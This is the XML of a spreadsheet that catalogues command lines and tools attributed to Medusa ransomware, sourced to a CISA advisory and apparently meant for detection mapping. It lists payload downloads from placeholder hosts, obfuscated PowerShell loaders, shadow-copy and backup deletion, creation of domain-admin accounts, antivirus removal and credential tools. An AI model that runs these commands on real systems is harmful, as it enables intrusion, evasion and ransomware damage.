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osi_ransom/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CF7D2597-75F2-AD43-83CC-3BDD07F573F7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="100" yWindow="-21100" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="7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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="340" uniqueCount="166">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll</t>
  </si>
  <si>
    <t>{ "data": "2025-03-25", "url": "https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf", "tags": ["medusa"]}</t>
  </si>
  <si>
    <t>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi</t>
  </si>
  <si>
    <t>cmd.exe /c driverquery</t>
  </si>
  <si>
    <t>cmd.exe /c echo Computer: %COMPUTERNAME% &amp; `
echo Username: %USERNAME% &amp; `
echo Domain: %USERDOMAIN% &amp; `
echo Logon Server: %LOGONSERVER% &amp; `
echo DNS Domain: %USERDNSDOMAIN% &amp; `
echo User Profile: %USERPROFILE% &amp; echo `
System Root: %SYSTEMROOT%</t>
  </si>
  <si>
    <t>cmd.exe /c ipconfig /all</t>
  </si>
  <si>
    <t>cmd.exe /c net share</t>
  </si>
  <si>
    <t>cmd.exe /c net use</t>
  </si>
  <si>
    <t>cmd.exe /c netstat -a</t>
  </si>
  <si>
    <t>cmd.exe /c sc query</t>
  </si>
  <si>
    <t>cmd.exe /c schtasks</t>
  </si>
  <si>
    <t>cmd.exe /c systeminfo</t>
  </si>
  <si>
    <t>cmd.exe /c ver</t>
  </si>
  <si>
    <t>cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname</t>
  </si>
  <si>
    <t>cmd.exe /c wmic printjob</t>
  </si>
  <si>
    <t>mmc.exe compmgmt.msc /computer:{hostname/ip}</t>
  </si>
  <si>
    <t>mstsc.exe /v:{hostname/ip}</t>
  </si>
  <si>
    <t>mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}</t>
  </si>
  <si>
    <t>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</t>
  </si>
  <si>
    <t>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (NewObject Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RMM tool&gt;.msi)</t>
  </si>
  <si>
    <t>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((
New-Object System.IO.StreamReader(
New-Object System.IO.Compression.GzipStream((
New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(
(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;',
'&lt;character replacement 1&gt;','&lt;character replacement 2&gt;')))),
[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</t>
  </si>
  <si>
    <t>powershell Remove-Item (Get-PSReadlineOption).HistorySavePath</t>
  </si>
  <si>
    <t>powershell Get-ADComputer -Filter * -Property * | Select-Object
Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path &lt;file path&gt;
-NoTypeInformation -Encoding UTF8</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe"</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe &amp;&amp; c:\gaze.exe"</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat</t>
  </si>
  <si>
    <t>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat</t>
  </si>
  <si>
    <t>nltest /dclist:</t>
  </si>
  <si>
    <t>net group "domain admins" /domain</t>
  </si>
  <si>
    <t>net group "Domain Admins" default /add /domain</t>
  </si>
  <si>
    <t>net group "Enterprise Admins" default /add /domain</t>
  </si>
  <si>
    <t>net group "Remote Desktop Users" default /add /domain</t>
  </si>
  <si>
    <t>net group "Group Policy Creator Owners" default /add /domain</t>
  </si>
  <si>
    <t>net group "Schema Admins" default /add /domain</t>
  </si>
  <si>
    <t>net group "domain users" /domain</t>
  </si>
  <si>
    <t>net user default /active:yes /domain</t>
  </si>
  <si>
    <t>net user /add default &lt;password&gt; /domain</t>
  </si>
  <si>
    <t>query user</t>
  </si>
  <si>
    <t>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0</t>
  </si>
  <si>
    <t>systeminfo</t>
  </si>
  <si>
    <t>vssadmin.exe Delete Shadows /all /quiet</t>
  </si>
  <si>
    <t>vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded</t>
  </si>
  <si>
    <t>del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.*%s*.set %s*.win %s*.dsk</t>
  </si>
  <si>
    <t>netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes</t>
  </si>
  <si>
    <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
  </si>
  <si>
    <t xml:space="preserve">mimikatz </t>
  </si>
  <si>
    <t>pdq deploy</t>
  </si>
  <si>
    <t>psexec</t>
  </si>
  <si>
    <t>rclone</t>
  </si>
  <si>
    <t>advanced IP scanner</t>
  </si>
  <si>
    <t>Softperfect Netscan</t>
  </si>
  <si>
    <t>scanned ports 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389</t>
  </si>
  <si>
    <t>medusa-eid0001</t>
  </si>
  <si>
    <t>medusa-eid0002</t>
  </si>
  <si>
    <t>medusa-eid0003</t>
  </si>
  <si>
    <t>medusa-eid0004</t>
  </si>
  <si>
    <t>medusa-eid0005</t>
  </si>
  <si>
    <t>medusa-eid0006</t>
  </si>
  <si>
    <t>medusa-eid0007</t>
  </si>
  <si>
    <t>medusa-eid0008</t>
  </si>
  <si>
    <t>medusa-eid0009</t>
  </si>
  <si>
    <t>medusa-eid0010</t>
  </si>
  <si>
    <t>medusa-eid0011</t>
  </si>
  <si>
    <t>medusa-eid0012</t>
  </si>
  <si>
    <t>medusa-eid0013</t>
  </si>
  <si>
    <t>medusa-eid0014</t>
  </si>
  <si>
    <t>medusa-eid0015</t>
  </si>
  <si>
    <t>medusa-eid0016</t>
  </si>
  <si>
    <t>medusa-eid0017</t>
  </si>
  <si>
    <t>medusa-eid0018</t>
  </si>
  <si>
    <t>medusa-eid0019</t>
  </si>
  <si>
    <t>medusa-eid0020</t>
  </si>
  <si>
    <t>medusa-eid0021</t>
  </si>
  <si>
    <t>medusa-eid0022</t>
  </si>
  <si>
    <t>medusa-eid0023</t>
  </si>
  <si>
    <t>medusa-eid0024</t>
  </si>
  <si>
    <t>medusa-eid0025</t>
  </si>
  <si>
    <t>medusa-eid0026</t>
  </si>
  <si>
    <t>medusa-eid0027</t>
  </si>
  <si>
    <t>medusa-eid0028</t>
  </si>
  <si>
    <t>medusa-eid0029</t>
  </si>
  <si>
    <t>medusa-eid0030</t>
  </si>
  <si>
    <t>medusa-eid0031</t>
  </si>
  <si>
    <t>medusa-eid0032</t>
  </si>
  <si>
    <t>medusa-eid0033</t>
  </si>
  <si>
    <t>medusa-eid0034</t>
  </si>
  <si>
    <t>medusa-eid0035</t>
  </si>
  <si>
    <t>medusa-eid0036</t>
  </si>
  <si>
    <t>medusa-eid0037</t>
  </si>
  <si>
    <t>medusa-eid0038</t>
  </si>
  <si>
    <t>medusa-eid0039</t>
  </si>
  <si>
    <t>medusa-eid0040</t>
  </si>
  <si>
    <t>medusa-eid0041</t>
  </si>
  <si>
    <t>medusa-eid0042</t>
  </si>
  <si>
    <t>medusa-eid0043</t>
  </si>
  <si>
    <t>medusa-eid0044</t>
  </si>
  <si>
    <t>medusa-eid0045</t>
  </si>
  <si>
    <t>medusa-eid0046</t>
  </si>
  <si>
    <t>medusa-eid0047</t>
  </si>
  <si>
    <t>medusa-eid0048</t>
  </si>
  <si>
    <t>medusa-eid0049</t>
  </si>
  <si>
    <t>medusa-eid0050</t>
  </si>
  <si>
    <t>medusa-eid0051</t>
  </si>
  <si>
    <t>medusa-eid0052</t>
  </si>
  <si>
    <t>medusa-eid0053</t>
  </si>
  <si>
    <t>medusa-eid0054</t>
  </si>
  <si>
    <t>medusa-eid0055</t>
  </si>
  <si>
    <t>medusa-eid0056</t>
  </si>
  <si>
    <t>medusa-eid0057</t>
  </si>
  <si>
    <t>medusa-eid0058</t>
  </si>
  <si>
    <t>medusa-eid0059</t>
  </si>
  <si>
    <t>medusa-eid0060</t>
  </si>
  <si>
    <t>medusa-eid0061</t>
  </si>
  <si>
    <t>medusa-eid0062</t>
  </si>
  <si>
    <t>medusa-eid0063</t>
  </si>
  <si>
    <t>medusa-eid0064</t>
  </si>
  <si>
    <t>medusa-eid0065</t>
  </si>
  <si>
    <t>medusa-eid0066</t>
  </si>
  <si>
    <t>medusa-eid0067</t>
  </si>
  <si>
    <t>medusa-eid0068</t>
  </si>
  <si>
    <t>medusa-eid0069</t>
  </si>
  <si>
    <t>medusa-eid0070</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>vss-pid</t>
  </si>
  <si>
    <t>registry-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>nltest-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>ipconfig-pid</t>
  </si>
  <si>
    <t>certutil-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid_type</t>
  </si>
  <si>
    <t>rclone-pid</t>
  </si>
  <si>
    <t>mimikatz-pid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</si>
</sst>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0.350139930553" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="70" xr:uid="{97DAC227-806D-CC43-9C4D-744C8CA2C2E2}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="1">
        <s v="{ &quot;data&quot;: &quot;2025-03-25&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;medusa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s v="medusa-eid0001"/>
    <s v="certutil-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0002"/>
    <s v="certutil-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0003"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c driverquery"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0004"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c echo Computer: %COMPUTERNAME% &amp; `_x000a_echo Username: %USERNAME% &amp; `_x000a_echo Domain: %USERDOMAIN% &amp; `_x000a_echo Logon Server: %LOGONSERVER% &amp; `_x000a_echo DNS Domain: %USERDNSDOMAIN% &amp; `_x000a_echo User Profile: %USERPROFILE% &amp; echo `_x000a_System Root: %SYSTEMROOT%"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0005"/>
    <s v="ipconfig-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c ipconfig /all"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0006"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c net share"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0007"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c net use"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0008"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c netstat -a"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0009"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c sc query"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0010"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c schtasks"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0011"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c systeminfo"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0012"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c ver"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0013"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0014"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c wmic printjob"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0015"/>
    <m/>
    <s v="cmdline"/>
    <s v="mmc.exe compmgmt.msc /computer:{hostname/ip}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0016"/>
    <m/>
    <s v="cmdline"/>
    <s v="mstsc.exe /v:{hostname/ip}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0017"/>
    <m/>
    <s v="cmdline"/>
    <s v="mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0018"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="powershell -exec bypass -enc &lt;base64 encrypted command string&gt;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0019"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (NewObject Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RMM tool&gt;.msi)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0020"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((_x000a_New-Object System.IO.StreamReader(_x000a_New-Object System.IO.Compression.GzipStream((_x000a_New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(_x000a_(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;',_x000a_'&lt;character replacement 1&gt;','&lt;character replacement 2&gt;')))),_x000a_[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0021"/>
    <m/>
    <s v="cmdline"/>
    <s v="powershell Remove-Item (Get-PSReadlineOption).HistorySavePath"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0022"/>
    <m/>
    <s v="cmdline"/>
    <s v="powershell Get-ADComputer -Filter * -Property * | Select-Object_x000a_Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path &lt;file path&gt;_x000a_-NoTypeInformation -Encoding UTF8"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0023"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} &quot;c:\windows\system32\taskkill.exe&quot; /f /im WRSA.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0024"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0025"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0026"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0027"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0028"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0029"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0030"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;c:\gaze.exe&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0031"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;copy \\ad02\sysvol\gaze.exe c:\gaze.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0032"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;copy \\ad02\sysvol\gaze.exe c:\gaze.exe &amp;&amp; c:\gaze.exe&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0033"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0034"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0035"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0036"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0037"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0038"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0039"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0040"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0041"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0042"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0043"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0044"/>
    <s v="psexec-pid"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0045"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0046"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0047"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain Admins&quot; default /add /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0048"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;Enterprise Admins&quot; default /add /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0049"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;Remote Desktop Users&quot; default /add /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0050"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;Group Policy Creator Owners&quot; default /add /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0051"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;Schema Admins&quot; default /add /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0052"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain users&quot; /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0053"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net user default /active:yes /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0054"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net user /add default &lt;password&gt; /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0055"/>
    <m/>
    <s v="cmdline"/>
    <s v="query user"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0056"/>
    <s v="registry-pid"/>
    <s v="cmdline"/>
    <s v="reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0057"/>
    <m/>
    <s v="cmdline"/>
    <s v="systeminfo"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0058"/>
    <s v="vss-pid"/>
    <s v="cmdline"/>
    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0059"/>
    <s v="vss-pid"/>
    <s v="cmdline"/>
    <s v="vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0060"/>
    <m/>
    <s v="cmdline"/>
    <s v="del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.*%s*.set %s*.win %s*.dsk"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0061"/>
    <s v="netsh-pid"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall add rule name=&quot;rdp&quot; dir=in protocol=tcp localport=3389 action=allow"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0062"/>
    <s v="netsh-pid"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall set rule group=&quot;windows management instrumentation (wmi)&quot; new enable=yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0063"/>
    <m/>
    <s v="cmdline"/>
    <s v="reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0064"/>
    <s v="mimikatz-pid"/>
    <s v="htool"/>
    <s v="mimikatz "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0065"/>
    <m/>
    <s v="htool"/>
    <s v="pdq deploy"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0066"/>
    <s v="psexec-pid"/>
    <s v="htool"/>
    <s v="psexec"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0067"/>
    <s v="rclone-pid"/>
    <s v="htool"/>
    <s v="rclone"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0068"/>
